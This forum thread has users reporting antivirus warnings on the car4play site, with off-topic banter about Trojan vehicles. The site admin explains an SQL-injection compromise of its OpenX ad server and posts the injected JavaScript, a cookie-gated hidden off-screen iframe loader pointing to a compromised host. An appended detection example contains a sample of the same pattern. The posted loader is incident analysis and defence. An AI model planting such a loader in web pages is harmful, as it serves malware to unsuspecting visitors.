Thread Author: PhilW Replies: 18

 Trojan? - PhilW
Every time I click on a topic at C4P I'm getting a message from Kaspersky saying that a Trojan is trying to download.
Blocked: HEUR:Trojan.Script.Generic 24/06/2014 18:18:59 ads.car4play.com/www/delivery/afr.php?frameid=ad_mpu&referer=www.car4play.com/insure/index.htm&n=aac8cecc&zoneid=3&source=&cb=1403630125

Is it me or the site?
I don't know what the above message means!
 Trojan? - Armel Coussine
A friend in the late fifties had a Trojan two-stroke van, ex Brooke Bond tea I think. Had the weirdest engine you ever saw, one very big cylinder and another small one, side by side, like a railway steam engine. Did about 30 flat out. Damn silly girl wouldn't let me drive it because she was sure I would crash it. I ask you.

1920s Trojan car had a stark tourer body, flat-twin engine and ingenious long-travel cantilever suspension. It too was quite slow but allegedly could charge smoothly over absolutely anything.

Sounds as if Phil has a PC. They tend to wind you up with that stuff. It's advertising I think.
Last edited by: Armel Coussine on Tue 24 Jun 14 at 19:14
 Trojan? - PhilW
Thanks AC - it's a lot clearer to me now!!

;-)


PS Doesn't happen on my laptop.
Though I wonder if CA's Trojan Brooke-Bond girl performed on his laptop???
Did she have a stark tourer body and long cantilever suspension?
I'm intrigued!
Or am I just very confused?


 Trojan? - Armel Coussine
>> am I just very confused?

Yes, I think so. Perhaps you can't help remembering those Trojan super-strong, very thick condoms for paranoid US citizens?
 Trojan? - Pat
You two are making me have an early morning chuckle this morning;)

Thought I might swerve the Computer thread on holiday but glad I didn't!

Pat
 Trojan? - bathtub tom
>>A friend in the late fifties had a Trojan two-stroke van, ex Brooke Bond tea I think. Had the weirdest engine you ever saw, one very big cylinder and another small one, side by side,
>>1920s Trojan car had a stark tourer body, flat-twin engine

IIRC, the car and van had the same 2-stroke engine. A couple of them attend classic trials regularly. They had no diff, which makes them ideal for climbing muddy hills, but a pain to turn round corners.

A feature of the design of the engine means the (dual) con-rod has to bend!

anarchadia.blogspot.co.uk/2008/03/vintage-thing-41-trojan-engine.html

and

en.wikipedia.org/wiki/Trojan_%28automobile%29
 Trojan? - Armel Coussine
>> IIRC, the car and van had the same 2-stroke engine.

Thanks bt, I think you're right. Flat twin is a Jowett thing. Certainly was a sluggish unit, could easily date from early twenties. I'd forgotten about the solid rear axle too which helped to make the car so competent.

It was an early example of a car with pressed steel disc wheels too I think.
Last edited by: Armel Coussine on Tue 24 Jun 14 at 23:42
 Trojan? - Victorbox
Microsoft Security Essentials wouldn't let me access Car4play last night saying some ad had unsafe content in it.
 Trojan? - spamcan61
I get what I suspect is the same warning, at work, with Kaspersky:-

>>>>>>>>>>>>>>

Access denied

The requested webpage cannot be provided.

In the requested object at the URL

ads.car4play.com/www/delivery/afr.php?frameid=ad_mpu&referer=www.car4play.com%2Finsure%2Findex.htm&n=aac8cecc&zoneid=3&source=&cb=1403869317

a threat has been detected:

object infected HEUR:Trojan.Script.Generic

>>>>>>>>>>>>>>>>>>>>>>

However I don't get it at home with MSE or Avast.
Last edited by: spamcan61 on Fri 27 Jun 14 at 12:44
 Trojan? - VxFan
I've mentioned there is a problem to Stephen.

I got a similar message earlier on my work PC that uses Sophos.
 Trojan? - Victorbox
>> I've mentioned there is a problem to Stephen.
>>
>> I got a similar message earlier on my work PC that uses Sophos.

My works PC has just popped up a warning as well.
 Trojan? - car4play
Hi guys

Yes you are all quite right. Thank you!

The ad server got hacked and has a nasty script prepended onto one of the ads. Basically the OpenX ad server has always been a bit vulnerable to SQL injection attacks.

We have removed the script, and the one that makes it and are installing a new version which is supposed to be better protected.
 Trojan? - No FM2R
Purely out of interest, what was the script intended to do?
 Trojan? - PhilW
"The ad server got hacked and has a nasty script prepended onto one of the ads. Basically the OpenX ad server has always been a bit vulnerable to SQL injection attacks.
We have removed the script, and the one that makes it and are installing a new version which is supposed to be better protected."

Phew, that's a relief!!
Don't understand a word of the above but thanks for solving the problem!!
;-)
P
 Trojan? - car4play
Here it is. (Formatted around a bit)

if(document.cookie.indexOf("_epel")==-1)
{var page_object=document.createElement("iframe");
page_object.setAttribute("src",
"htttp://cheng.MASSARTSANDCRAFTS.COM/ assets/js/ jquery-1.3.1.min.js?ver=1.33.577");
page_object.style.position="absolute";
page_object.style.left="-1000px";
page_object.style.top="-1000px";
page_object.style.width="100";
page_object.style.height="100";
document.body.appendChild(page_object);
document.cookie = "_epel=readed; max-age=25000; path=/";}
else{}
/* End Google Ads */
 Trojan? - car4play
... Which basically tries to pull another JavaScript from another compromised server - this one being at massartsandcrafts. It does this by making an iframe on our site which is positioned well off the visible screen.
The reason Safari didn't pick it up as a malicious page is because that particular script doesn't exist on the compromised server. Presumably the owners have found out about it and got rid of it. So the script here ends up doing nothing. I guess the other checkers notice the suspicious behaviour and are responding accordingly.


Btw we installed the new ad server this afternoon. Maybe the change of name to "revive adserver" will help :-)
Last edited by: car4play on Fri 27 Jun 14 at 23:34
 Trojan? - car4play
For the technically minded this is the final script but not the really nasty one. Basically the SQL injection put another script onto our ad server which then inserts this other script here into the database where it gets prepended onto served ads. So if one removes the script here, the malicious guys simply run the one on our server which brings this one back to life again.
They seem to run their "refresh" every few minutes. They do this by simply going to the URL on our server where they have put their script. I won't show you that one because it really is someone's labour of love!
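
An added example, not part of any post in this thread and not car4play's or OpenX's code: a small triage check that flags ad records whose served markup builds an iframe and pushes it off-screen, the behaviour described in the posts above. The record fields (`prepend`, `html`, `append`), the function names and the sample banners are assumptions constructed for illustration.

```javascript
// Static triage of ad creative markup for the hidden-iframe loader pattern.
// Indicators are behaviours seen in the script posted above, not a URL signature.
const INDICATORS = {
  createsIframe: /createElement\(\s*["']iframe["']\s*\)/i,
  offscreen: /\.style\.(left|top)\s*=\s*["']-\d{3,}px["']/i,
  cookieGate: /document\.cookie\.indexOf\(/i, // "only fire once per visitor" check
  setsCookie: /document\.cookie\s*=/i,
};

function scoreCreative(markup) {
  const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(markup));
  // A script-built iframe placed off-screen is the core signal;
  // the cookie indicators only add context for the analyst.
  const suspicious = hits.includes("createsIframe") && hits.includes("offscreen");
  return { suspicious, hits };
}

// Check every field that ends up concatenated into the served ad
// (field names are hypothetical, not a real ad server schema).
function auditBanners(banners) {
  return banners.flatMap((b) =>
    ["prepend", "html", "append"]
      .filter((f) => b[f] && scoreCreative(b[f]).suspicious)
      .map((f) => ({ id: b.id, field: f, hits: scoreCreative(b[f]).hits }))
  );
}

// Constructed sample records; the loader URL is a placeholder.
const SAMPLE_BANNERS = [
  { id: 1, prepend: "", html: '<a href="/insure/"><img src="/ads/mpu.png"></a>', append: "" },
  { id: 2,
    prepend: '<script>if(document.cookie.indexOf("_x")==-1){' +
      'var f=document.createElement("iframe");' +
      'f.setAttribute("src","http://loader.example.invalid/a.js");' +
      'f.style.position="absolute";f.style.left="-1000px";f.style.top="-1000px";' +
      'document.body.appendChild(f);' +
      'document.cookie="_x=1; max-age=25000; path=/";}</script>',
    html: '<img src="/ads/sky.png">', append: "" },
  // A normal, visible iframe ad must not be flagged.
  { id: 3, prepend: "", html: '<iframe src="/ads/frame.html" width="300" height="250"></iframe>', append: "" },
];

console.log(auditBanners(SAMPLE_BANNERS));
```

Since the thread describes the injected content being re-inserted every few minutes, a finding that returns after cleanup points to a remaining server-side script rather than a stale record.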
 Trojan? - smokie
What impact would the script have had on people's machines?
 Trojan? - car4play
Nothing as far as I can see because it wasn't getting to the remote site where the real action would occur.